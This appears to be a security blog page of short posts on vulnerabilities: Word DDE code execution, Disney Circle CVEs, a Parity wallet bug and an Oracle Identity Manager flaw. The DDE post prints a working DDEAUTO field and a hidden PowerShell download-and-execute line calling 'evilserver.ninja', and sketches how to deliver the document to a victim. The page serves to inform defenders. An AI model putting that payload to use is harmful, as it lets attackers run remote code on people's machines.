Hackers Using Unpatched Microsoft Dynamic Data Exchange Exploit

There is a vulnerability present in Microsoft Office using it’s Dynamic Data Exchange (DDE) protocol. Exploiting it requires “no macros or, memory corruption”, and doesn’t show any security warnings (if correctly implemented) or raise flags with any antivirus software. There are thousands of applications that use DDE protocol, including MS Word and Excel.

DDE allows two running applications to share data, and can be set to do so either once, or whenever new data is becomes available. For example, one could use DDE to target a cell in Excel, and receive updates whenever that cell is edited. You can sync a cell in your own Excel doc with the cell in the original document.

The blog from Sensepost focused on using Microsoft Word and DDE to gain undetected access to command execution. The exploit is performed by editing an error message produced by adding a field to a Word doc. The error is edited to contain something like the following:

{DDEAUTO c:\\windows\\system32\\cmd.exe "/k calc.exe"  }

Or, you could do something worse than open the calculator, like this:

{ DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe -NoP -sta 
-NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString
('http://evilserver.ninja/pp.ps1');powershell -e $e "}

Basically, you tell Word to execute an automatically updating DDE field, and then you have the field execute command prompt, also calling your payload. In the proof of concept demonstration, they used a powershell command to launch an Empire stager as the payload.

Whenever the Word document is opened it will ask first for permission to allow the file to be updated by a linked file. If DDE is something you deal with, this would be nothing unusual. There is then a second prompt which is a security warning due to the DDE asking for access to command prompt, however, this can be hidden with “proper syntax modification” according to the blog. Then you just have to get the word file on the target system, and get the target to open the file, and click okay on the one prompt that pops up to allow the data to be shared. Boom, payload delivered.

Microsoft was sent this exploit, replicated it, and decided that it was a feature, so it will not be patched anytime soon. Microsoft has also released a Security Advisory in regards to various DDE related vulnerabilities, most involve the user changing settings to use Secure and Control Office. This requires the use of the Registry Editor, which if done incorrectly can break your computer, requiring you to reinstall your OS.

This vulnerability is now being exploited by cybercriminals and state-sponsored hackers. Notably, it has been utilized by the hacking group “Fancy Bear” which is believed to be affiliated with the Russian government. They have been using a spearphishing campaign around the New York terror attack in recent weeks to bait users into clicking on the malicious documents, infecting their system with malware. It has also been used against several organizations and companies in various forms.

Since it is a Microsoft process, nothing will stop DDE from running whatever is sent through it. One way to protect yourself is by disabling DDE entirely on your machines. You can also use Microsoft’s recommendation using the Registry Editor to secure Office, or you could go into the settings for some of the apps that use DDE and disable automatic updating or receiving updates from other DDE applications. As always, don’t click links or download files from emails unless you are certain that the source is safe.

 

Daniel Szafran

 

Article Sources:

Macro-less Code Exec in MSWord    – (contains demo and proof of concept for exploit)

Russian ‘Fancy Bear’ Hackers Using (Unpatched) Microsoft Office DDE Exploit

Microsoft Security Advisory 4053440

Advertisements

The Security of Disney’s Circle Device

When thinking about Disney, most people think of the amusement park rides, the cartoons, or even the luxurious restaurants, shops, and hotels that they have created. This general branding of Disney™ has set this idea of a kid friendly and family orientated experience. Regarding Disney’s past technology, Disney is fairly new to the technology game and is always trying to get their research and new innovative technologies mostly integrated within their theme parks. One product that has nothing to do with the theme parks or cartoons that Disney stands for is called the Circle.

The Circle is a device that is made to connect family devices together, but most importantly, protect kids from going on certain websites. The idea of this device is to be able to monitor devices, without having the hassle of dealing with loading on software on every device. The product connects to all devices under the same network (wired or wireless) and the host user of the Circle is able to set time on device use, block, and view whatever is happening on the devices. Even though the idea of this device that Disney put out had good ideas behind it, there became a multiple number of vulnerabilities with the software and product, although, two major ones stand out.

The first vulnerability involves a notification bug with the software of the Circle. In general, intricate network packets can be created which leads to a OS command injection, where the attacker can send an HTTP request to trigger the vulnerability (CVE-2017-2917). The second vulnerability involves a bug in the signature verification of firmware updates for the Circle. An attacker who develops well-crafted network packets can cause an unsigned firmware to be installed where then alternate code can be loaded onto the device (CVE-2017-2898).

Overall, there are multiple vulnerabilities that are associated with this device released by Disney. Disney should have alternatively tested multiple common vulnerability techniques before launch of the Circle. In order to prevent further attacks from happening, Disney should sit down and go through these vulnerabilities and patch them, along with creating a stronger protective layer for the device for future encounters of similar attacks.

-Ryan Keihm

Resources

www.zdnet.com/article/circle-with-disney-web-filter-riddled-with-vulnerabilities

https://www.disneyresearch.com/

http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-2917

http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-2898

https://disneyprogramsblog.com/security-professional-development-study/

 

 

Please, Perform Proper Pre-release Procedures

Parity Wallet, a wallet used for storing Ethereum, had a serious vulnerability exposed in July, with its multi-factor wallets. One party could take over ownership of another’s wallet. A white hat group of Ethereum users realized what was going on and used the same vulnerability to claim every other users’ wallet so that the original actor (black hat, stole roughly $30 million) could not. On July 20th, this vulnerability was patched.

Now there’s a new issue.

Any multi-factor wallets created or updated after the July 20th patch can no longer move money out of their wallet. This is because calling initWallet just converts a contract library into a multi-factor wallet instead of allowing one to use the wallet.

This is not an issue with Ethereum at large, only with Parity Multi-factor wallets.

Official post: https://paritytech.io/blog/security-alert.html

By: Connor Shade

Google Play Store Fails Vetting Again…

whatsapp-bubbles-664x374

In case you haven’t noticed, I like beating up on the Google Play Store just a bit. More fake apps were released onto the Play Store. Instead of stealing personal information through phony banking apps, attackers are now spamming users with ads through fake WhatsApp messenger lookalikes.

Continue reading

Oracle Identity Manager Hacked through a Critical Flaw

 

Based in Redwood, California, Oracle Corporation is the largest software company whose primary business is database products. Historically, Oracle has targeted high-end workstations and minicomputers as the server platforms to run its database systems. Its relational database was the first to support the SQL language, which has since become the industry standard.

A exploit was found in Oracle’s identity management system. This exploix has been marked as CVE-2017-10151, it has been assigned the highest CVSS score of 10 and is easy to exploit without any user interaction.

This CVE is due to a security loophole involving a default account that allows an unathenticated attacker on the same network to compromise the Oracle Identity Manager through HTTP.

The full details of this vulnerability have not yet been released by Oracle.

“This vulnerability is remotely exploitable without authentication, i.e., may be exploited over a network without requiring user credentials,” Oracle’s advisory reads.

The easily exploitable vulnerability affects Oracle Identity Manager versions 11.1.1.7, 11.1.1.9, 11.1.2.1.0, 11.1.2.2.0, 11.1.2.3.0 and 12.2.1.3.0.

Oracle has already released patches for all versions of the products that were affected by this CVE. all users should update to the latest version of Oracle to patch the vulnerability before a hacker has the chance to exploit it.

Justin Palmer

Sources:

https://thehackernews.com/2017/10/oracle-identity-manager.html

https://www.oracle.com/index.html